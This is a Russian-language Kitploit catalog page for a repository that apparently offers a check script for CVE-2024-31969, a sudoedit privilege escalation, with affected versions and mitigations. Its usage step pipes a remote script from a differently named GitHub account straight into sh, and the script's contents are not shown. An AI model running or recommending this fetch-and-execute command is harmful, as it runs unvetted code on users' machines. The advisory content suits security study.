Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-31969 — Предоставляет proof-of-concept проверочный скрипт и документацию для CVE-2024-31969 — локального повышения привилегий в sudoedit из состава sudo, включая затронутые версии и рекомендации по смягчению последствий. | Kitploit
Инструменты/GitHubGitHub/gmh5225/cve-2024-31969
Повышение привилегийАнализ уязвимостейЭксплуатацияОбучение и ОбразованиеПодобранные Ресурсы
GitHubgmh5225/cve-2024-31969

CVE-2024-31969

Предоставляет proof-of-concept проверочный скрипт и документацию для CVE-2024-31969 — локального повышения привилегий в sudoedit из состава sudo, включая затронутые версии и рекомендации по смягчению последствий.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

📌 CVE-2024-31969

CVE-2024-31969 — это уязвимость локального повышения привилегий в sudo при использовании команды sudoedit.

Эта уязвимость была внедрена начиная с sudo 1.9.0 из-за недостаточно корректной проверки переменных окружения пользователя и прав владения файлами в sudoedit.


📖 Описание

A flaw introduced in sudo 1.9.0 in how sudoedit validated users' environment variables and file ownership.

Эта уязвимость позволяет локальному пользователю с доступом к sudoedit изменять произвольные файлы от имени root посредством манипуляции переменными окружения, такими как SUDO_EDITOR, или с помощью использования символьных ссылок.


📊 Затронутые версии Sudo:

Версия SudoСтатус
1.9.0 → 1.9.15p4🔥 Уязвима
1.9.15p5 и выше✅ Безопасна
1.8.x (включая 1.8.23)❌ Не затронута

📦 Установка и использование

Выполните следующую команду:

root@kitploit:~
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh

🛠️ Решение / Меры по смягчению

  • Обновите sudo до версии 1.9.15p5 или новее.
  • Ограничьте правила sudoers, разрешающие sudoedit для пользователей, не являющихся root.
  • Используйте безопасную конфигурацию env_keep или env_reset в файле /etc/sudoers.

📚 Ссылки

  • CVE-2024-31969 на NVD

⚠️ Отказ от ответственности

Этот репозиторий создан в образовательных целях и для документирования безопасности систем.
Категорически запрещается использовать эту информацию для незаконной деятельности или без письменного разрешения владельца системы.
Любое злоупотребление полностью находится вне ответственности автора.

Скачать инструмент